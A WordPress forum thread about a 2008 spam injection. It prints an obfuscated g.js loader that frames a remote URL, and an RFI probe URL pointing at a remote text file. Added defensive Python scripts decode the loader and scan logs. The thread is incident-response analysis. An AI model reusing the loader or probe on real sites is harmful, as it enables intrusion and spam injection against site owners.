
My site was ambushed...need help figuring out how (30 posts)

  1. griffman
    Member
    Posted 6 years ago #

    [Note: I edited this post to contain the full .js file]

    Tonight, while checking my site backup's sync log, I noticed a folder named "1" in the output, residing at the top level of the wp-content folder. Within the "1" folder, there are 71 separate files -- 70 poker-site-spammy HTML pages, each in Italian, and one g.js file. There was also a folder named backup-6bb0d, which contained a zero-byte index.php, at the top level of the wp-content folder. The wp-content's index.php file (which just says 'silence is golden') had also been edited or replaced -- but the only change is a blank line on row one. My site itself wasn't hacked -- all files and folders are just fine. No new stories or comments or users were created, etc. It seems the extent of the hack was creating the "1" folder.

    I checked my sftp, ftp, and access logs, and there's nothing suspicious there at all -- which makes me suspect this is some sort of injection attack. I searched the logs around the time the files were created, but with my limited technical skills, nothing seemed out of whack (there are no references to "poker.html" in any of the log files, for instance). The g.js file contains one "var str" definition that's ASCII encoded; I decoded it and got this output (line breaks added for readability):

    var referer = escape(document.referrer);
    var fromd    = escape(document.location);
    document.write("<fram"+"eset frame"+"border=0 frames"+"pacing=0 border=0 rows=\"1"+"00%, * \"noresize><fr"+"ame name=\"online\" src=\""+fid+"&q="+q1+"&referer="+referer+"&l="+lang+"&c="+subacc+"&from="+fromd+"\" noresize></fra"+"meset>");

    That means nothing at all to me. Here's the full .js file, with the "var str" bit removed, given it's shown above:

    function Decode()
    {
        // Each character of the payload is stored as its decimal char code,
        // '#'-separated, so the file contains no readable keywords.
        var temp = "", i, c = 0, out = "";
        var str = "118#97#114#32#..."; // full encoded string elided in this post; decoded above
        l = str.length;
        while (c <= str.length - 1)
        {
            // collect digits up to the next '#'
            while (str.charAt(c) != '#')
                temp = temp + str.charAt(c++);
            c++;
            // turn the collected digits back into one character
            out = out + String.fromCharCode(temp);
            temp = "";
        }
        // writes the decoded frameset markup into the page
        document.write(out);
    }

    function r(keyw, cat, lang)
    {
        // the remote URL is split into pieces to defeat simple string matching
        document.write("<script language='javascript'>");
        document.write("var fid='http://www.preserve"+"sight"+"colorado.org/feb.php?2'; var q1='"+keyw+"'; var lang='"+lang+"'; var subacc='"+cat+"';");
        Decode();
        document.write("<\/script>");
    }

    In the HTML files themselves, there are only four links. The first three are external links, but they simply go to the Italian versions of Google, MSN, and Yahoo (nothing passed with the URLs at all, just the root). The fourth is an href link back to the document itself, like this:

    <a href="giochi-poker-gratis-da-scaricare.html">giochi poker gratis da scaricare</a>

    I'm not sure if the JavaScript works (somehow?) with that last URL, but that's all that's in each file (I'll gladly send anyone the folder if you want to take a look at the whole thing). I also Googled on one of the less-commonly-named files, and found that my site is not alone. As you can see there, a number of WordPress sites contain the "1" folder and associated HTML files.

    My site runs WordPress 2.3.3, but I do use a number of third-party plug-ins -- and that's where my suspicions lie for the most likely culprit. However, I don't have any idea how to go about figuring out how someone got in ... nor if there are better places than this to report an apparent security issue. So if anyone can offer any advice, I'd welcome it!

    thanks;
    -rob.

  2. Joni
    Member
    Posted 6 years ago #

    Yep, someone here on the WP forums warned about it on March 13 and posted this link: (I cannot find the original WP post right now, but I did bookmark the link.)

    http://seo.mhvt.net/blog/?p=268

  3. whooami
    Member
    Posted 6 years ago #

    It would be useful to know what plugins you have on that site.

    Let me guess -- you are using either wp-cache, or wp-db-backup? Or both?

  4. macsoft3
    Member
    Posted 6 years ago #

    Someone here on the WP forums warned about it on March 13...

    That was our story. The article is shown at p=268. So you've got the right link. So far, at least 62 or 63 WordPress blog websites are known to have been exploited in this manner. robservatory.com is not in the list.

    griffman, I wonder if you could send those 71 files in a zip to junk912@gmail.com? We love junk files and junk mail. Again, we do analyze security issues. Thanks.

  5. griffman
    Member
    Posted 6 years ago #

    Plug-ins. I have a larger number installed, but only these are active (are non-active plug-ins exploitable??):

    Active Discussions 1.1
    Addicted To Live Search 1.02
    AJAX Comment Preview 1.2.1
    Ajaxified Expand NOW 0.8 beta 2
    Category Replacement Widget 0.5
    Dashboard Options 1.4.1
    Drop-down Archive Widget 0.2
    Get Recent Comments 2.0.2
    GetWeather 1.2.1
    Get Weather Widget 0.2
    http:BL WordPress Plugin 1.4
    Linkblock widget 1.1rc0
    Spam Karma 2 2.3 rc4

    I have wp-db-backup installed, but non-active. I do not have wp-cache installed. I have one additional personal plug-in (custom registration screen) I wrote installed, but given other sites have been hit with the same thing, I doubt it's the problem.

    macsoft3: files sent.

    Thanks all for the answers -- I searched here, but didn't find the March 13th post...not sure what happens from here out (should I report this somehow to the WP developers?), but I'm certainly going to keep an eye on my wp-content folder!

    -rob.

  6. whooami
    Member
    Posted 6 years ago #

    If your wp-content directory is still writable, fix that.

    chmod 755.

    That's one of the first things I would be doing. I've argued against plugins and settings that require that for three years.

    As to whether or not non activated plugins are potentially exploitable -- yes, they are -- when it comes to any kind of Remote File Inclusion attacks. If I can call a file, I can use it. Whether or not a plugin is activated makes no difference.

    I would be interested in seeing your Apache log files, if you have them available.

    I am not in China, or some other Southeast Asian country (that's notorious for what else but spam), and I don't pretend to be some "spam terrorist" warrior. I also don't use this forum as an advertising agency for my own blog. Furthermore, terrorist, as macsoft has used it, is grossly incorrect. But that's another story altogether.

    Anyway, if you feel like having another set of eyes look over them, I would love to see your Apache access logs for this month. And your error logs, if you have them being generated separately. I don't need to see the content of the added files; they're useless.

    My email addy is whoo --AT-- whoo.org

  7. macsoft3
    Member
    Posted 6 years ago #

    Thanks, griffman. I got it. jonimueller is referring to the March 13 report at seo.mhvt.net. If you can answer, what is the date stamp on those files in folder 1? Is it March 12 or 13? Or around 02:58 AM on the 15th? I'm just curious. Again, thanks. They started hacking WP websites at least before the 11th.

  8. griffman
    Member
    Posted 6 years ago #

    My wp-content directory is *not* generally writable, nor has it ever been generally writable. Here's what it's set up as:

    drwxr-xr-x Mar 16 08:42 wp-content

    I have removed the inactive plug-ins, and also killed the xmlrpc.php file, as I don't use its features. I will send you the March-ish access logs, but I don't have error logs (my host does not provide them, sadly).

    -rob.

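As an added illustration of the two checks whooami and griffman are discussing (is wp-content writable by everyone, and what has appeared in it since the last known-good state), here is a Python script that is not from the thread or from WordPress. It builds a constructed wp-content look-alike in a temporary directory, including a 777 uploads folder and a freshly dropped top-level "1" directory like the one described above, then reports world-writable directories and everything modified after a reference time. The directory names, file names and timestamps are made up for the demo.

```python
import os
import shutil
import stat
import tempfile
import time


def world_writable_dirs(root):
    """Directories under root whose mode grants write to 'other'
    (777-style); a 755 directory is not reported."""
    found = []
    for dirpath, _dirnames, _filenames in os.walk(root):
        if os.stat(dirpath).st_mode & stat.S_IWOTH:
            found.append(os.path.relpath(dirpath, root))
    return sorted(found)


def changed_since(root, since_epoch):
    """Files and directories under root whose mtime is newer than since_epoch
    (for example the time of the last known-good backup). A chmod alone does
    not change mtime, so a permission change is not reported here."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if os.lstat(path).st_mtime > since_epoch:
                found.append(os.path.relpath(path, root))
    return sorted(found)


def build_demo_tree():
    """Constructed wp-content look-alike (demo data, not a real install):
    a normal 755 tree backdated 30 days, plus a world-writable uploads
    directory and a freshly created top-level "1" folder holding a spam page."""
    root = tempfile.mkdtemp(prefix="wp-content-demo-")
    os.chmod(root, 0o755)
    for rel in ("plugins", "themes", "uploads"):
        os.mkdir(os.path.join(root, rel))
        os.chmod(os.path.join(root, rel), 0o755)   # explicit: do not rely on umask
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php\n// Silence is golden.\n?>")

    # Backdate everything created so far so it reads as the known-good state.
    backup_time = time.time() - 30 * 86400
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            os.utime(os.path.join(dirpath, name), (backup_time, backup_time))

    # Two things an audit should flag: a 777 directory and new content.
    os.chmod(os.path.join(root, "uploads"), 0o777)
    os.mkdir(os.path.join(root, "1"))
    with open(os.path.join(root, "1", "giochi-poker-gratis.html"), "w") as fh:
        fh.write("<html><body>spam page (constructed)</body></html>")
    return root, backup_time


def remove_demo_tree(root):
    """Clean up the temporary tree created by build_demo_tree()."""
    shutil.rmtree(root)


if __name__ == "__main__":
    root, backup_time = build_demo_tree()
    try:
        print("world-writable directories:", world_writable_dirs(root))
        print("modified since backup:", changed_since(root, backup_time))
    finally:
        remove_demo_tree(root)
```

Run against a real wp-content, the second check is the one that catches a dropped "1" folder even when every directory is already 755, which is exactly the situation several posters describe.
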
  9. griffman
    Member
    Posted 6 years ago #

    macsoft: The files were all timestamped 2:58am on the 15th.

    -rob.

  10. macsoft3
    Member
    Posted 6 years ago #

    Thanks, griffman. That means they are constantly hacking WP blogs.

    There's an interesting code embedded in g.js. It's "118#97#114#32#114#101#102#101#114#101#114#32#61#32#101#115#99#97#112#101#40#100#111#99#117#109#101#110#116#46#114#101#102#101#114#114#101#114#41#59#10#118#97#114#32#102#114#111#109#100#32#32#32#32#61#32#101#115#99#97#112#101#40#100#111#99#117#109#101#110#116#46#108#111#99#97#116#105#111#110#41#59#10#100#111#99#117#109#101#110#116#46#119#114#105#116#101#40#34#60#102#114#97#109#34#43#34#101#115#101#116#32#102#114#97#109#101#34#43#34#98#111#114#100#101#114#61#48#32#102#114#97#109#101#115#34#43#34#112#97#99#105#110#103#61#48#32#98#111#114#100#101#114#61#48#32#114#111#119#115#61#92#34#49#34#43#34#48#48#37#44#32#42#32#92#34#110#111#114#101#115#105#122#101#62#60#102#114#34#43#34#97#109#101#32#110#97#109#101#61#92#34#111#110#108#105#110#101#92#34#32#115#114#99#61#92#34#34#43#102#105#100#43#34#38#113#61#34#43#113#49#43#34#38#114#101#102#101#114#101#114#61#34#43#114#101#102#101#114#101#114#43#34#38#108#61#34#43#108#97#110#103#43#34#38#99#61#34#43#115#117#98#97#99#99#43#34#38#102#114#111#109#61#34#43#102#114#111#109#100#43#34#92#34#32#110#111#114#101#115#105#122#101#62#60#47#102#114#97#34#43#34#109#101#115#101#116#62#34#41#59#"

    I thought I could decode it, but to no avail so far.

    Ahh, sorry. griffman already decoded it.

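Here is an added Python example, not code from the thread or from the g.js file, that re-implements the '#'-separated character-code decoding griffman described in the first post and that macsoft3 tried by hand above, using the encoded string from macsoft3's post as input. It also rejoins the split string literals ("<fram"+"eset") that keep words like frameset out of the decoded text, which is what makes such a payload hard to find with a simple grep; the rejoining regex is my own simplification and only handles plain "..."+"..." concatenations.

```python
import re

# The encoded payload from the g.js file quoted in this thread (copied from the
# post above; split across lines here only for readability).
ENCODED_PAYLOAD = (
    "118#97#114#32#114#101#102#101#114#101#114#32#61#32#"
    "101#115#99#97#112#101#40#100#111#99#117#109#101#110#116#46#"
    "114#101#102#101#114#114#101#114#41#59#10#"
    "118#97#114#32#102#114#111#109#100#32#32#32#32#61#32#"
    "101#115#99#97#112#101#40#100#111#99#117#109#101#110#116#46#"
    "108#111#99#97#116#105#111#110#41#59#10#"
    "100#111#99#117#109#101#110#116#46#119#114#105#116#101#40#"
    "34#60#102#114#97#109#34#43#34#101#115#101#116#32#102#114#97#109#101#34#"
    "43#34#98#111#114#100#101#114#61#48#32#102#114#97#109#101#115#34#"
    "43#34#112#97#99#105#110#103#61#48#32#98#111#114#100#101#114#61#48#32#"
    "114#111#119#115#61#92#34#49#34#43#34#48#48#37#44#32#42#32#92#34#"
    "110#111#114#101#115#105#122#101#62#60#102#114#34#43#34#97#109#101#32#"
    "110#97#109#101#61#92#34#111#110#108#105#110#101#92#34#32#115#114#99#61#92#34#34#"
    "43#102#105#100#43#34#38#113#61#34#43#113#49#43#34#38#114#101#102#101#114#101#114#61#34#"
    "43#114#101#102#101#114#101#114#43#34#38#108#61#34#43#108#97#110#103#43#34#38#99#61#34#"
    "43#115#117#98#97#99#99#43#34#38#102#114#111#109#61#34#43#102#114#111#109#100#43#34#"
    "92#34#32#110#111#114#101#115#105#122#101#62#60#47#102#114#97#34#"
    "43#34#109#101#115#101#116#62#34#41#59#"
)


def decode_hash_charcodes(encoded: str) -> str:
    """Mirror of the JavaScript Decode() loop: every '#'-terminated run of
    digits is one decimal character code."""
    out = []
    for token in encoded.split("#"):
        token = token.strip()          # tolerate stray whitespace from copy/paste
        if not token:                  # the trailing '#' leaves an empty token
            continue
        if not token.isdigit():
            raise ValueError(f"unexpected token {token!r} in encoded payload")
        out.append(chr(int(token)))
    return "".join(out)


# A closing quote, '+', and reopening quote: "<fram"+"eset" -> "<frameset".
SPLIT_LITERAL_RE = re.compile(r'"\s*\+\s*"')


def collapse_split_literals(js_source: str) -> str:
    """Rejoin adjacent double-quoted literals so the hidden keywords
    (frameset, frame, ...) read as the browser would see them.
    Simplification: only handles "..."+"..." with no escaping in between."""
    return SPLIT_LITERAL_RE.sub("", js_source)


def markup_tags(js_source: str) -> list:
    """Tag names present in the text the script writes into the page."""
    return re.findall(r"<(/?[a-z]+)", js_source)


if __name__ == "__main__":
    decoded = decode_hash_charcodes(ENCODED_PAYLOAD)
    print(decoded)
    print("---- after rejoining split literals ----")
    joined = collapse_split_literals(decoded)
    print(joined)
    print("tags written by the script:", markup_tags(joined))
```

Note that the word "frameset" never occurs in the decoded text, only in the rejoined version; a scanner that looks for tag names in a file on disk has to apply both steps before it will see what the browser ends up executing.
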
  11. whooami
    Member
    Posted 6 years ago #

    Great, Rob. I'm looking forward to looking at them.

    If you like, I can provide a way for you to do some more intense logging, and I HIGHLY recommend finding out if your host has mod_security compiled into Apache. If they do, use it.

  12. whooami
    Member
    Posted 6 years ago #

    I found the exploit in your logs. Check your email in a few minutes.

    I will be emailing security@wordpress.org

  13. whooami
    Member
    Posted 6 years ago #

    There were http_posts sent to certain files (that I pointed out in my emails). The data sent in the posts isn't going to be seen in your logs, unfortunately. The filename, however, is clear as day.

    You can log ALL http_posts. I've emailed you a few times, so I'll wait to hear back from you, and then, if you are willing, you can be a honeypot :)

    I'll also take this opportunity to reiterate that I would not share this info with anyone else. It's NOT going on MY blog, and anything we talk about in emails is between you, me, and whoever answers email at security@

  14. whooami
    Member
    Posted 6 years ago #

    Without divulging the file name, I should say that I just looked through my own mod_security logs, and see a different attempt at an RFI attack, pointed at a core file that lives inside wp-includes/

    Interesting. Time to go test that.

  15. thesu
    Member
    Posted 6 years ago #

    This happened to me, too! The file was timestamped 3/18. My wp-content folder was already set at permission 755, so I don't know how the hacker got in there. I was running wp-cache and deactivated it. I also deleted the "1" folder, but I wonder if the hacker will come back?

  16. whooami
    Member
    Posted 6 years ago #

    this thread was resolved, thesu. I assure you that if your site was compromised at some point, they will come back.

    You might not see 'em, but they will come back. Keep in mind that coming back doesn't mean they are successful -

    There were several key things left out of your post though:

    1. What version of WP were you running at the time you discovered the hack? You're running 2.3.3 now..

    2. What have you done to secure your site since seeing this? You mention nothing.

    Deleting the files.. is like putting a bandaid on a severed artery. You just bleed to death slower.

  17. TheTim
    Member
    Posted 6 years ago #

    I just discovered the same issue on my site, which is running WordPress 2.3.3. Whooami, you say that this was resolved, but I don't see any explanations of what can be done to prevent it from happening again? The permissions on my wp-content folder are already set to 755.

    So what's the solution to this?

  18. whooami
    Member
    Posted 6 years ago #

    I have blogged about what I have done in repairing previously hacked sites on my own blog. This isn't a directory permission issue; it never has been one. People that suggest otherwise aren't aware of how the exploits are being used.

    This thread was resolved because the OP contacted me privately. The underlying issue is hardly resolved, because WP users with compromised sites aren't taking the necessary steps to ensure their sites are made secure.

    1. http://www.village-idiot.org/archives/2008/03/18/wordpress-spam-inject-honeypot/

    2. http://www.village-idiot.org/archives/2008/03/19/wordpress-spam-inject-honeypot-2/

  19. mvandemar
    Member
    Posted 6 years ago #

    "This thread was resolved because..."

    This thread is not actually resolved, since a clean install of 2.3.3 has this vulnerability as well. While changing the cookie names may indeed thwart whatever bot it is that is currently pushing out this exploit, I can promise you that it is a stopgap at best.

  20. raygene
    Member
    Posted 6 years ago #

    If your wp-content directory is still writable, fix that.

    chmod 755.

    That's one of the first things I would be doing. I've argued against plugins and settings that require that for three years.

    OK, just did that, thanks.

    Will the 755 permissions interfere with the plugins?

    Gene

  21. whooami
    Member
    Posted 6 years ago #

    I've offered to help set up $_POST logging for anyone that is interested in coming to more definitive conclusions regarding any of the hacked sites and their causes. For people that are so terribly concerned, I've gotten few replies.

    I've contacted 10 or so admins privately about their hacked installs -- no replies, the blogs remain exploited, and not surprisingly, the admins keep posting. In other words, they seemingly don't care.

    The OP in this thread was contacted by a developer as well as getting help from me, and since it's his thread, and his problem was solved, the thread is resolved. The rest of you are "hangers on" who aren't adding anything meaningful to the fray, in my opinion.

    Here is the offer again, if you think fresh installs of 2.3.3 are vulnerable, then set up $_POST logging and see what happens. If you need to know how to do that, contact me off list.

    Secondly, Apache logs all $_GET requests, which would clearly show RFI attacks that are called like so:

    archives/2006/06/29/wp-chunk//wp-content/plugins/sniplets/modules/syntax_highlight.php?variable_removed=http://americanpsycho.net/new/id.txt?

    Instead of standing by and waiting for someone else to take some initiative, start looking at things, and start being proactive instead of reactive.

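To make whooami's point concrete that GET-based RFI attempts are visible in the access log while POST bodies are not, here is an added Python example (my own code, not something from the thread) that parses Apache combined-log lines and flags any query-string parameter whose value is itself a URL, which is the shape of the request quoted above. The log lines, IP addresses, plugin path and remote host in SAMPLE_LOG are constructed for the example, not taken from anyone's server.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in Apache combined log format (not from a real server).
# Line 1: GET-based remote-file-inclusion probe, a parameter whose value is a URL.
# Line 2: ordinary page view.
# Line 3: POST to wp-login.php; its body never appears in the access log.
# Line 4: the same kind of probe with the URL hidden behind percent-encoding.
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Mar/2008:02:55:01 +0000] "GET /wp-content/plugins/example-plugin/include.php?cfg=http://198.51.100.7/s.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '198.51.100.23 - - [15/Mar/2008:02:56:10 +0000] "GET /?p=268 HTTP/1.1" 200 8041 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [15/Mar/2008:02:58:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/4.0"',
    '192.0.2.9 - - [16/Mar/2008:09:00:00 +0000] "GET /index.php?redirect=%68ttp%3A%2F%2F192.0.2.9%2Fx.txt HTTP/1.1" 404 0 "-" "curl/7.18"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# A parameter value that starts with a URL scheme is the hallmark of an RFI probe.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def parse_line(line):
    """Split one combined-log line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_rfi_attempts(log_lines):
    """Requests whose query string carries a remote URL as a parameter value."""
    hits = []
    for line in log_lines:
        entry = parse_line(line)
        if entry is None:
            continue
        target = entry["target"]
        query = urlsplit(target).query
        # parse_qsl percent-decodes once; decode a second time so a
        # double-encoded value ("%2568ttp") does not slip past the check.
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = unquote(value)
            if REMOTE_URL_RE.match(value):
                hits.append({
                    "ip": entry["ip"],
                    "time": entry["time"],
                    "path": urlsplit(target).path,
                    "param": name,
                    "remote": value,
                    "status": int(entry["status"]),
                })
    return hits


def posts_without_body(log_lines):
    """POST requests: the access log records the target but never the payload,
    so these need server-side POST logging (or mod_security) to investigate."""
    return [e for e in map(parse_line, log_lines) if e and e["method"] == "POST"]


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} {hit["path"]} param={hit["param"]} '
              f'-> {hit["remote"]} (HTTP {hit["status"]})')
    for e in posts_without_body(SAMPLE_LOG):
        print(f'{e["time"]} {e["ip"]} POST {e["target"]}: body not in access log')
```

The status code is deliberately kept in the output: a 404 or 500 still records that the probe was made, and a 200 on a plugin file with a URL parameter is the line worth reading first.
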
  22. whooami
    Member
    Posted 6 years ago #

    I will share some info on the wp-content/1 thing in an attempt to get some synapses firing.

    The OP provided myself and a developer his Apache logs.

    Looking inside his logs, it was clear where and when the actual upload of the files took place. It was also clear what file was being used to accomplish the upload.

    There were a couple things that stood out to me though.

    First, there were hits to wp-login.php immediately prior to the upload. Were they successful logins from a subscriber? (the OP has only one administrator account) From a forged cookie? I don't know, since we don't see $_POST variables in Apache logs.

    Secondly, they wrote content to wp-content/index.php, and in turn that content precipitated a call to another file, which was responsible for grabbing all the uploaded content and unpacking it.

    I can tell you that the calls to the WordPress file in question result in you being immediately redirected to wp-login.php

  23. whooami
    Member
    Posted 6 years ago #

    Actually, after taking another look at the OP's logs -- it's clear that the login was successful. There are 11 log entries, spanning three minutes; they start with a login and end with a call to a core WP file that cannot be called unless you are logged in. In between, there are calls to the same core WP file, and one file that is created that appears responsible for the uploaded content.

  24. zdes
    Member
    Posted 6 years ago #

    One of my clients just pointed out the same problem. After some investigation I found something that piqued my curiosity...

    At the root of /wp-content/ was a folder named "advanced-cache.php"; any attempt to open it or change the permissions would result in an FTP error. Renaming it was allowed, though, but it would not let me download it. Finally, after trying this and that, I was able to open it using the ftp browser built into Firefox... I was able to delete this file by creating a new directory, moving it there and deleting the new directory.

    here are the contents:
    ----- BEGIN

    time() ) {
        $meta = new CacheMeta;
        if (! ($meta = unserialize(@file_get_contents($meta_pathname))) ) return;
        foreach ($meta->headers as $header) {
            header($header);
        }
        $log = "\n";
        if ( !($content_size = @filesize($cache_file)) > 0 || $mtime < @filemtime($cache_file)) return;
        if ($meta->dynamic) {
            include($cache_file);
        } else {
            /* No used to avoid problems with some PHP installations
            $content_size += strlen($log);
            header("Content-Length: $content_size");
            */
            if(!@readfile ($cache_file)) return;
        }
        echo $log;
        die;
    }
    $file_expired = true; // To signal this file was expired
    }

    function wp_cache_postload() {
        global $cache_enabled;
        if (!$cache_enabled) return;
        require(ABSPATH . 'wp-content/plugins/wp-cache/wp-cache-phase2.php');
        wp_cache_phase2();
    }

    function wp_cache_get_cookies_values() {
        $string = '';
        while ($key = key($_COOKIE)) {
            if (preg_match("/^wordpress|^comment_author_email_/", $key)) {
                $string .= $_COOKIE[$key] . ",";
            }
            next($_COOKIE);
        }
        reset($_COOKIE);
        return $string;
    }
    ?>

    -----

    We are on WP 2.1.3 - with a whole lot of plugins,
    wp-content CHMODed to 755

  25. zdes
    Member
    Posted 6 years ago #

    Oops, advanced-cache.php is a symlink for wp-cache. DO NOT delete it! It will break WP.

  26. burchwords
    Member
    Posted 6 years ago #

    This happened to me too. Is there any way to tell what caused it?

  27. bigbluemachine
    Member
    Posted 6 years ago #

    I believe my WP site is included in these numbers = ( of sites attacked.
    I discovered the problem early yesterday morning by happenstance, as I don't go merrily tromping through my source code too often (not being a "tech guy" with the full-on "tech guy know-how" to fall back on, I never thought it a safe thing to fool around in.)

    As it stands, the normal guy I ask when something tech comes up is stumped, and possibly because his own WP sites aren't affected hasn't really looked into it as far as I am trying. So I've been pretty stressed out about this.

    I deleted from the 2 sections in the presentation edit area I found the attack in (header and footer php respectively), and other than furiously searching for any signs on the internet that would point to "I've done enough and the problem is fixed" or "I deleted just the visible part of the problem and future danger from this cyber rape (sorry, it's how I feel about it = /) is on the horizon."

    Any help, info, or anything really ( even some cyber condolences lol) would be most helpful.
    I'm still looking out there and I still have a few links yet to check out so wish me luck and I hope all of you affected as well have managed or are managing to contain the damage.
    Thanks in advance.

  28. sonnata
    Member
    Posted 5 years ago #

    I just wanted to thank whooami for helping us to sort out the same issue with our site. I probably made the problem worse by trying to fix it myself.

    I'm really clueless when it comes to blogs. Whooami did a great job figuring out the problem, rapidly fixing it & suggesting ways to keep it from happening again.

    Thanks Whooami!

  29. whooami
    Member
    Posted 5 years ago #

    You're welcome :)

  30. sonnata
    Member
    Posted 5 years ago #

    Now, that's what I call fast!

Topic Closed

This topic has been closed to new replies.
